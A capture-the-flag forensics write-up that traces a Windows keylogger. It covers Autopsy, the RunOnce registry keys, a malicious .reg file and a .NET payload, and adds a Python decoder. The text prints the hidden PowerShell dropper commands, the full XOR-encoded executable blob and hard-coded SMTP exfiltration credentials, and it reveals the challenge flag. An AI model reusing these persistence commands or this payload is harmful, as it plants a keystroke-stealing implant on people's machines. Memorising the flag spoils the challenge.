Solution

We are provided with an archive. Extracting it gives us two files, autopsy.db and InfectedMachine.aut. A quick search online shows that these belong to Autopsy, a digital forensics tool used to investigate disk images taken from other machines.

After downloading and opening the tool, we choose Open Case and load the .aut file provided. Make sure the .db and .aut files are in the same folder, since the case file refers to the database next to it.
Autopsy will then report that it cannot locate the .E01 disk image; we can point it at the image manually to resolve this.
Once the case is loaded, Autopsy exposes everything we might need from Mikey's machine. Now what?

Well, the description mentioned a persistent issue on Mikey's machine: CMD windows popping up every time he reboots. If you are not familiar with persistence on Windows, one of the most basic techniques is the Run and RunOnce registry keys. Malware authors add values under these keys whose data is a command line. Every time the user logs on, Windows executes each of those commands; a Run value is executed at every logon, while a RunOnce value is deleted after it has run once.

Now, where do we find these keys?
For the current user these keys live under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and \RunOnce (the machine-wide equivalents sit under HKEY_LOCAL_MACHINE, but the description points at Mikey's account). HKEY_CURRENT_USER is not a file of its own: it is the user's hive, which Windows loads from the NTUSER.DAT file in the user's profile directory, so that is the file we open in Autopsy:


We use this file to read the current user's (Mikey's) registry because NTUSER.DAT stores the per-user portion of the registry: desktop settings, Start menu configuration, application preferences and any other keys written under HKEY_CURRENT_USER for that account.

Navigating to the RunOnce key, we find two very interesting values:


The first command is: cmd.exe /c "powershell -windowstyle hidden $reg = gci -Path C:\ -Recurse *.reg ^| where-object {$_.length -eq 0x00002AE3} ^| select -ExpandProperty FullName -First 1; $bat = '%temp%\tmpreg.bat'; Copy-Item $reg -Destination $bat; ^& $bat;"
The second command is: cmd /c more +7 %temp%\tmpreg.bat > %temp%\tmpreg2.bat & %emp%\tmpreg2.bat
(The ^| and ^& are cmd.exe escapes: they stop cmd from treating the pipe and the call operator as its own syntax so that they reach PowerShell intact. Note also that the second entry, as stored on the machine, reads %emp% rather than %temp% in its last part.)

This explains the two CMD windows popping up: there are two startup entries, each spawning a cmd.exe process, and -windowstyle hidden only hides the PowerShell window, not the cmd window that launches it. What do these commands do though?

The first entry searches the whole of C:\ recursively for a file with a .reg extension whose size is exactly 0x2AE3 (10979) bytes, copies the first match to %temp%\tmpreg.bat and executes it as a batch file. The second uses more +7 to strip the first 7 lines from that batch file (the .reg header and the RunOnce section that cmd cannot execute anyway), writes the remainder to %temp%\tmpreg2.bat and runs that. It might not make a lot of sense yet, but every operation revolves around the mysterious .reg file. Let's locate it!

To do so, we navigate to Tools -> File Search by Attributes and search for the .reg extension:


The search returns only one file with a .reg extension, and it contains very suspicious data:


We can right-click the file and extract it for further analysis. Its contents are:

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"startup_entry"="cmd.exe /c \"powershell -windowstyle hidden $reg = gci -Path C:\\ -Recurse *.reg ^| where-object {$_.length -eq 0x00002AE3} ^| select -ExpandProperty FullName -First 1; $bat = '%temp%\\tmpreg.bat'; Copy-Item $reg -Destination $bat; ^& $bat;\""
"startup_entry2"="cmd /c more +7 %temp%\\tmpreg.bat > %temp%\\tmpreg2.bat & %emp%\\tmpreg2.bat"



cmd /c "powershell -windowstyle hidden $file = gc '%temp%\\tmpreg.bat' -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file^| select -Skip 000739)) -Encoding Byte; ^& $path;"
exit
:-ηwtwwwswwwˆˆwwΟwwwwwww7wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwχwwwyhΝywΓ~ΊVΟv;ΊV#WWWWWW38$WYzz}Swwwwwww'2ww;vtwςΎwwwwwwww—wUw|vGwwiwwwwwwwww=KwwwWwww7wwww7wwWwwwuwwswwwwwwwqwwwwwwwwχwwwuwwwwwwuwςwwgwwgwwwwgwwgwwwwwwgwwwwwwwwwwwLww8wwww7wwΫrwwwwwwwwwwwwwwwwwwwww{www·MwwkwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwWwwwwwwwwwwwwwWww?wwwwwwwwwwwYwww'kwwwWwwwiwwwuwwwwwwwwwwwwwwWwwYwwwΫrwww7wwwqwwwWwwwwwwwwwwwwww7ww7Yww{wwwwwwwuwwwQwwwwwwwwwwwwww7ww5wwwwwwwwwwwwwwww[Kwwwwww?wwwuwrwΛ\wwsxwwtwuwuwwqwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwAwqwwq_twwqw]wwdGtwΏwwwvwwfwuvwws_xww}|p[zuvwwso_gww}wfww}}qTwwwwχ8E6eww}wqu‰qrwwqdww}cww}wq`bww}wq`aww}w\wa{\ w_vwwqz~`Y}~Wvχˆˆ‰v\v`dsfs[Bwuvwws``ww}druvwwso_gww}wfru_swwqoww}wfrnww}w\dw`/{Wˆwww‰sdqfqZμw`dp\ηdGtw~wwuwwfwvww}ti‰v|p[|tww}O;~wwth~‰v{[|fww}OO~wwthz‰vz~[|jww}OS~wwthd‰vdsfs[|Zww}Oy~wwthc‰vdrfr[|Jww}Owwthl‰vdqfq[|"ww}O•wwthW‰vdpfp[|ww}O»wwthV‰vdf[|ww}OΑwwthU‰vd~f~[|ςww}OΧwwthT‰vd}f}[|κww}OύwwthS‰vd|f|[|ήww}OwwthR‰vd{f{[|ΐww}O)wwthQ‰vdzfz[|΄ww}O?wwthP‰vdyfy[|Ίww}OEwwth_‰vdxfx[|ww}Okwwth[‰vdgfg[|œww}OqwwthZ‰vdfff[|~vw}O‡pwwthY‰vdefe[|lvw}O­pwwthG‰vddfd[|Zvw}O³pwwthF‰vdcfc[|Fvw}OΩpwwthE‰vdbfb[|Bvw}OοpwwthD‰vdafa[|Nvw}OυpwwthC‰vd`f`[|Jvw}OpwwthB‰vdofo[|6vw}O!pwwthA‰vdnfn[|2vw}O7pwwth@‰vdmfm[|>vw}O]pwwthO‰vdlfl[|:vw}OcpwwthN‰vdkfk[|&vw}O‰qwwth6‰vdjfj[|"vw}OŸqwwth5‰vdifi[|.vw}O¥qwwth4‰vdhfh[|*vw}OΛqwwth3‰vdWfW[|vw}OΡqwwth2‰vdVfV[|vw}Oηqwwth1‰vdUfU[|vw}O
qwwth0‰vdTfT[|vw}Oqwwth?‰vdSfS[|vw}O9qwwth>‰vdRfR[|vw}OOqwwth=‰vdQfQ[|vw}OUqwwth<‰vdPfP[|
vw}O{qwwth;‰vd_f_[|φvw}Orwwth:‰vd^f^[|ςvw}O—rwwth9‰vd]f][|ώvw}O½rwwth8‰vd\f\[|ϊvw}OΓrwwth'‰vd[f[[|ζvw}Oιrwwth&‰vdZfZ[|βvw}Orwwth%‰vdYfY[|ξvw}Orwwth$‰vdXfX[|κvw}O+rwwth#‰vdGfG[|Φvw}O1rwwth"‰vdFfF[|vw}OGrwwth!‰vdEfE[|ήvw}Omrwwth ‰vdDfD[|Ϊvw}Osrwwth/‰vdCfC[|Ζvw}O™swwth.‰vdBfB[|Βvw}O―swwth-‰vdAfA[|Ξvw}Oµswwth,‰vd@f@[|Κvw}OΫswwth+‰vdOfO[|Κvw}Oαswwth*‰vdNfN[|¦vw}Oχswwth‰vdMfM[|Zvw}Oswwth‰vdLfL[|Fvw}O#swwth‰vdKfK[|Bvw}OIswwth‰vdJfJ[|Nvw}O_swwth‰vdIfI[|Jvw}Oeswwth‰vdHfH[|6vw}O‹twwth‰vd7f7[|2vw}O‘twwth‰vd6f6[|>vw}O§twwth‰vd5f5[|:vw}OΝtwwth‰vd4f4[|&vw}OΣtwwth‰vd3f3[|¨vw}Oωtwwth‰vd2f2[|”vw}Otwwth‰vd1f1[|vw}Otwwth‰vd0f0[|œvw}O;twwth‰vd?f?[|˜vw}OAtwwth‰vd>f>[|„vw}OWtwwth‰vd=f=[|Švw}O}twwth‰vd<f<[|puw}Oƒuwwth‰vd;f;[|fuw}O©uwwth‰vd:f:[|luw}OΏuwwth‰vd9f9[|Ruw}OΕuwwth‰vd8f8[|Xuw}Oλuwwth ‰vd'f'[|Nuw}Oρuwwth‰vd&f&[|4uw}Ouwwth‰vd%f%[|:uw}O-uwwth
‰vd$f$[|.uw}O3uwwth‰vd#f#[|uw}OYuwwtWηwww‰vd"f"[|uw}ObuwwtWζwww‰vd!f![|πuw}O‹vwwtWΧwww‰vd f [|Τuw}O”vwwtWΦwww‰vd/f/[|Τuw}O½vwwtWΥwww‰vd.f.[|Δuw}OΖvwwtWΤwww‰vd-f-[|Δuw}OοvwwtWΣwww‰vd,f,[|¶uw}OvwwtWwww‰vd+f+[|¶uw}OvwwtWΜwww‰vd*f*[|Ίuw}O:vwwtWΝwww‰vd)f)[|¦uw}OCvwwtWΛwww‰vd(f([|œvw}OlvwwtWΚwww‰vdf[|vw}OuvwwtWΙwww‰vdf[|Άuw}OžwwwtW·www‰vdf[|®uw}O§wwwtWΘwww‰vdf[|uw}OΐwwwtW¶www‰vdf[|˜vw}OιwwwtWµwww‰vdf[|Άuw}OςwwwtW¬www‰vdf[–uw}\tW«www‰vdf[’uw}\.tWwww‰vdf[žuw}\4tW©www‰vdf[šuw}\ZtW•www‰vdf[†uw}\`žuwxv_mww}’uw_lww}}qd\wf]wwlGtw§wwwtwwfwwkww}}‚uwjww}|qdtwiww}hww}wqWww}htwVww}wq^tw_Uww}Tww}_Sww}Rww}wuvwws_xww}a‰vdsfs[u©uvwwsQww}{Pww}z_ww}wuvwws_^ww}wq~]ww}wpW<uww\ww}wpBtwtw[ww}Zww}wp`Yww}wpqXww}ww©qdrww©w]vgwwwwvwΏΎwq`wwv	uh__Gww}¬tw_Sww}
vwwsu_Fww}w]5$=5vwvwwwww{wwwCYGYDGDFNwwwwrwwwwοtwwT	wwsswwƒswwT$wwwwww‡twwT"$wŸ{wwgwwwT0">3www{ww{uwwT5wwwwwwwuwwv buc~wwwwvDwawwvwwwQwwwuwwwvwwwqwwwrwwwFwwwywwwtwwwvwwwvwwwvwwwuwwwww‹vvwwwwwqwvιtqw©vιtqwwtxwΙtwwqwΊwΌuqw#vΌuqwBvΌuqw²vΌuqwζvΌuqwέvΌuqw“wΌuqwΞwtqwΰwtqwovΌuqwˆw}uqw8sΑu}w?tPsqw9tgw}wtPs}w'wu}wsuqwstgwqw„uΑuqw+wgwqwΊtgw}wCtPsqw,tgwqwvwΑuqwQuΑu}wBsu}wuuqw–s#uqw¥sgsqwftgw}w5us}wΫssqwρsΑuΰwktwwwwwwpwwwwwvwvwwwgwΩu]t6wvwvwvwLugvwwwwχwαWwdvvw'Wwwwwζw±uovuwWwwwwφwκsqwtwCVwwwwφwΏsivtwΗ]wwwwφwόuTvswλ\wwwwρotqwqwwwvw7uwwvwŒtwwvw<wwwvw3wwwuwu~wtvwfwtqwnwt}w^wtgwFwtgwNwtgw6wtgw>wtgw&wtgw.wtgwwtbwwtgwwtgwwtgw¶w6sPw¶w«t[wώwtqwώwuDw¦wtOwώwDwIwώwsbwώwPwbwζwt3w®wζwgw®wwqw–wSuΞwžw?sΚwΦwtqwήwtgw†wtgwΦwΚu¦wΦwŠu wŽwTwgwvvεs«w~vwΞwžw?s•wΦw!sgwΖwtgwfvwΞwfvwqw¶wύwŸwΦwΘsgwήwΤsvwnvtšwήwws„wήwΧubwήwHww^vZuwvφwtqwYw|w]vYwdwDvYwlw%vYwTw,vYw\wvYwDwvYwLwvYw4w,vYw<wvYw$wvYw,wvYwwvYwwΕvYwwΘvmw=w³wβuwvtwwvwsχwwvwwwwwwwwwwwww]twwswwwwwwwwwwwpvmwwwwwswwwwwwwwwwwpvΑuwwwwwww>DEwK:Iw$Y>8ww6w(2w(2w$www::w1w(9w%;w4w06<$w3w w06w36w4!6w6#6w6#6w#1 6w61!6w646w636w4%6w6'6w646w646w%46w<;Yw$Y%Y!w#$w01'www9 4w$Y$Y'w(>w$Y9Y:w2wDEYw(2$w'w$w(1w:w$Y%w:64w2w(#w$%w#%w$1w<;w22?w#w$ w# wYw$Y3w$Y%Y>$w$Y%Y4$w3:w16w$6w226ww(4w$Y$Y4w$Y#w:6w2w4w8w($w$Y9w(6%w$4w2w04ww('w>45?w(5w<w4>w  >wwwwwvwz,w5wwww*ww|,w#w6w5w*wwx,w2wwwww*wwx,w'wwwww*ww`,w4wwwwWw;wwww*ww|,w2www*wwx,w$wwwww*wwd,w'wwwwWw"ww*ww`,w'wwwwWw3ww ww*ww|,w2www*wwz,w?wwww*ww|;wwww*ww~,w"ww*wwx,w%wwwww*wwz,w3ww ww*wwj,w'wwwwwWw$wwwwww*wwf,w>wwwwww*wwf,w3wwwwww*wwtGwwtFwwtEwwtDwwtCwwtBwwtAwwt@wwtOwwtNwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwtwwt wwtwwtwwt
wwd,w wwwww ww*wwz,w;wwww*wwt]wwt\wwtZwvt[wwtXww~,w1wFw*ww~,w1wEw*ww~,w1wDw*ww~,w1wCw*ww~,w1wBw*ww~,w1wAw*ww~,w1w@w*ww~,w1wOw*ww~,w1wNw*ww|,w1wFwGw*ww|,w1wFwFw*ww|,w1wFwEw*wwb,w9wwwWw;wwww*wwl,w$wwwwwwWw;wwww*wwx,w$wwwww*wwz,w4wwww*ww|,w6www*wwtJwwtwvtYwwtPwvtLwwtΓwvt*wwt,wwt	wwt+wwjwwwwYwwwwwwYwwwww|wwwwww~wwwww|;wwwMwWwwDwwwwwDwGwCwCwDwEwDwCw7wwwwwwwwYwwwww!w?w=wwww1www
w9ww.ww9ww-w3w1ww-wFwNww:wDwww:w0www:w
w>wFw/wDw&w w/wDw>w
w-wEw.www3w:wFww&wJwJwwf+w;wwwYwwwwwwww½iY8<Θ|Ÿ‹ΌwsWvvtWwvrWvvffsWvvysWvvu{pe2uue>uuswvuyqwuvyfsWvvzrWuvkorWvverWuvyupyuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuytWwyqwtyyyy{pqe&e"e.yue*rWvvesWwe
rwweχφrwuyyyswvvyrWuvyyqWvveχζrWvve&qwvyfχξΐ
+!nC—ώuqyswvrwvvjysWvyqWuvke:vwwwwwwivwvw#ua 92# vvwpvwwwwyvw~<;wwrvwwww`vwe4WµήWWEGF@ww^vwSB@NNNFEZNGCZCDNZONEBZOGCNOFOCGww{vwpFYGYGYGww>vwmY92#1 [!JCYOvw#yc1 39eY92#W1 WCYOwwwwwwwςΎwwwwuwwwkvww«Mww«kww%$3$~ΠZΦ7Πω^…ΤG„vwww4M+"+(CB+3 +ZZ+<;+<;++3+<;YwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwWKwwwwwwwwwwMKwwwWwwwwwwwwwwwwwwwwwwwwww[Kwwwwwwwwwwww(42:wYwwwwwˆRwW7wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwuwgwwwWwwχowww'wwχwwwwwwwwwwwwwwvwvwwwOwwχwwwwwwwwwwwwwwvwwwwwχwwwwwwwwwwwwwwwwwvwvwwwwwχwwwwwwwwwwwwwwvwwwwwΫtwwη7wwktwwwwwwwwwwktCwww!w$w(w!w2w%w$w>w8w9w(w>w9w1w8wwwwwΚs˜‰wwvwwwvwwwwwwwvwwwwwHwwwwwwwswwwvwwwwwwwwwwwwwww3wwwvw!www1wwww>wwwwwwwwSwswww#wwwwwwwwwwwwwwwwwΗsuwwvw$wwwwww1wwww>wwwwww/uwwvwGwGwGwGwGwCwwGwwwmwvwvw4wwwwwwwwwwwwwwUwvwvw4wwwwwww9wwwwwwwwwwwwKw}wvw1wwww3wwwwwwwwwwwwwww<www;wwwwwwwwGwwvw1wwww!wwwwwwwwwwwFwYwGwYwGwYwGwwwKwywvw>wwwwwwww9wwwwww<www;wwwwwwYwwwwww?wewvw;wwwww4wwwwwwwwwww4wwwwwwwwwWwήwWwWwEwGwFw@www]wvwvw;wwwww#wwwwwwwwwwwwwwwwww3wywvw8wwwwwwww1wwwwwwwwww<www;wwwwwwYwwwwwwCw}wvw'wwwwwww9wwwwwwww<www;wwwwwwwwCwwvw'wwwwwww!wwwwwwwwwFwYwGwYwGwYwGwwwOwwvw6wwwwwwwwWw!wwwwwwwwwFwYwGwYwGwYwGwwwΛ4wwvwwwwwwwwww˜ΜΘKHWJUFYGUWJU"#1ZOUWJUUHIz}z}KWJUMZZMYFUW!JUFYGUIz}WWK>WJUFYGYGYGUWJU:6YUXIz}WWK>WJUMZZMYEUIz}WWWWKIz}WWWWWWK'WJUMZZMYDUIz}WWWWWWWWK2;WJU>UW6JUUXIz}WWWWWWKX'Iz}WWWWKXIz}WWKX>Iz}KXIwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwGww{www;Kwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

The command reads %temp%\tmpreg.bat as raw bytes, XORs every byte with the key 0x77, discards the first 739 bytes (select -Skip 000739; PowerShell reads the leading zeros as decimal 739), writes what is left to a randomly named .exe in %temp% and executes it. Two quick checks confirm the decoding before we bother with the full file: the long runs of w in the blob are zero bytes (0x77 XOR 0x77 = 0x00), exactly what padding in a PE file looks like, and the first two bytes after the exit line are :- (0x3A 0x2D), which XOR with 0x77 to 0x4D 0x5A, the MZ signature. So by loading the .reg file into CyberChef, dropping everything up to and including the exit line, and XORing with 0x77 we get the following executable:


Note: Copying and pasting bytes by hand can corrupt the executable (the blob contains non-printable and non-ASCII bytes), so load the .reg file itself into CyberChef and then keep only the bytes you want to decode.
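The same extraction can be scripted, which avoids the copy-paste problem entirely. The script below is an added example written for this writeup, not code from the original post or from the challenge: it parses the REGEDIT4 text to list the RunOnce commands (undoing the .reg escaping so they read as cmd.exe sees them), locates the encoded payload as the first byte after the exit line, XORs it with 0x77 and refuses to write anything unless the result starts with MZ. The embedded SAMPLE_REG is a constructed stand-in with a tiny fake PE stub so the script runs offline; pass the path of the real extracted .reg file to decode the actual sample.

```python
import re
from typing import Dict, Optional

KEY = 0x77          # single-byte XOR key from the dropper: $file[$i] -bxor 0x77
SKIP = 739          # byte offset the dropper discards: select -Skip 000739
REG_SIZE = 0x2AE3   # file size the first-stage command searches for: $_.length -eq 0x00002AE3


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with a one-byte key; the same operation encodes and decodes."""
    return bytes(b ^ key for b in data)


def parse_reg_values(blob: bytes) -> Dict[str, str]:
    """Collect "name"="value" lines from a REGEDIT4 export.
    .reg text doubles backslashes and escapes quotes; undo that so each
    command reads exactly as cmd.exe will receive it from the registry."""
    values: Dict[str, str] = {}
    for m in re.finditer(rb'(?m)^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$', blob):
        name = m.group(1).decode("latin-1")
        values[name] = re.sub(rb"\\(.)", rb"\1", m.group(2)).decode("latin-1")
    return values


def payload_offset(blob: bytes) -> int:
    """Offset just past the 'exit' line, where the XOR-encoded PE begins."""
    m = re.search(rb"(?m)^exit\r?\n", blob)
    if m is None:
        raise ValueError("no 'exit' line found; is this the right .reg file?")
    return m.end()


def extract_payload(blob: bytes, skip: Optional[int] = None, key: int = KEY) -> bytes:
    """Replicate the dropper: drop the leading text, XOR the rest, and check
    that the result is a PE image (first two bytes must be 'MZ')."""
    if skip is None:
        skip = payload_offset(blob)
    pe = xor_bytes(blob[skip:], key)
    if pe[:2] != b"MZ":
        raise ValueError(f"no MZ header at offset {skip}; wrong offset or key?")
    return pe


# Constructed sample (not the real challenge file): same layout as the .reg
# shown above, with a minimal fake DOS header + PE signature as the payload.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
SAMPLE_REG = (
    b"REGEDIT4\r\n\r\n"
    b"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce]\r\n"
    b'"startup_entry"="cmd.exe /c \\"powershell -windowstyle hidden ...\\""\r\n'
    b'"startup_entry2"="cmd /c more +7 %temp%\\\\tmpreg.bat > %temp%\\\\tmpreg2.bat"\r\n'
    b"\r\n"
    b'cmd /c "powershell -windowstyle hidden ... -bxor 0x77 ... -Skip 000739 ..."\r\n'
    b"exit\r\n"
    + xor_bytes(FAKE_PE)
)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
        if len(blob) != REG_SIZE:
            print(f"warning: size {len(blob)} != 0x{REG_SIZE:X}; the dropper would not pick this file")
    else:
        blob = SAMPLE_REG

    for name, cmd in parse_reg_values(blob).items():
        print(f"{name}: {cmd}")
    off = payload_offset(blob)
    print(f"payload starts at offset {off} (dropper hard-codes {SKIP})")
    pe = extract_payload(blob)
    if len(sys.argv) > 1:
        with open("extracted.exe", "wb") as f:
            f.write(pe)
        print(f"wrote extracted.exe ({len(pe)} bytes)")
```

On the real file the offset derived from the exit line and the dropper's hard-coded 739 should agree; if they do not, the MZ check fails loudly rather than producing a silently corrupt binary.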

If we save the output and run the file command on it, we see it is a Mono/.NET assembly:

└─$ file extracted.exe  
extracted.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

.NET assemblies can be decompiled with tools like dnSpy or ILSpy. I prefer ILSpy for static analysis, so I'll go with that one.

Opening the file in ILSpy shows that the program is a keylogger: it records the user's keystrokes and sends the logs out by email over SMTP, with the credentials hard-coded in the binary:

smtpClient.Credentials = new NetworkCredential("cafim30443234@arinuse.com", "VHJvamFuezNtYjNkZDFuZ19rM3lsMGdnMzI1X3QwX3IzZ2YxbDM1fQ==");


The password looks suspiciously like base64 (the trailing == padding gives it away), and decoding it gives us the flag:

>>> from base64 import b64decode
>>> b64decode(b"VHJvamFuezNtYjNkZDFuZ19rM3lsMGdnMzI1X3QwX3IzZ2YxbDM1fQ==")
b'Trojan{3mb3dd1ng_k3yl0gg325_t0_r3gf1l35}'